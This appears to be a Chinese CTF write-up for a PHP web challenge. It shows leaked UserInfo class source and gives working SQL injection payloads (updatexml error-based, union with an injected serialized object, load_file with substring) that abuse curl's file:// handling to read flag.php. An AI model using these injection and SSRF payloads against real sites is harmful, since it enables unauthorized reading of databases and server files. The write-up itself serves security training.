• 可以扫到robots.txt, login.php, flag.php
  • robots.txt 中发现一个user.php.bak,代码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

怀疑博客地址那里可以ssrf

预期解

  • view.php存在报错注入
1
view.php?no=1 and updatexml(1,concat(1,(SELECT database())),1) #
  • 可以发现users表中存储了UserInfo类反序列化后的结果
  • 利用union联合注入使得查询到的语句是我们想要的反序列化值,在博客地址那里构造file协议读取flag.php
  • 得到反序列化值:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

$a = new UserInfo('fuck','0','file:///var/www/html/flag.php');
echo serialize($a);
?>
  • 联合注入
1
view.php?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"fuck";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' #

查看源代码得到base64编码的flag.php

非预期解

  • 直接去读flag.php
1
view.php?no=1 and updatexml(1,concat(1,(SELECT load_file('/var/www/html/flag.php'))),1) #
  • updatexml有长度限制,可以用substring分批读取,即可读到flag
1
view.php?no=1 and updatexml(1,concat(1,(SELECT substring(load_file('/var/www/html/flag.php'),10,30))),1) #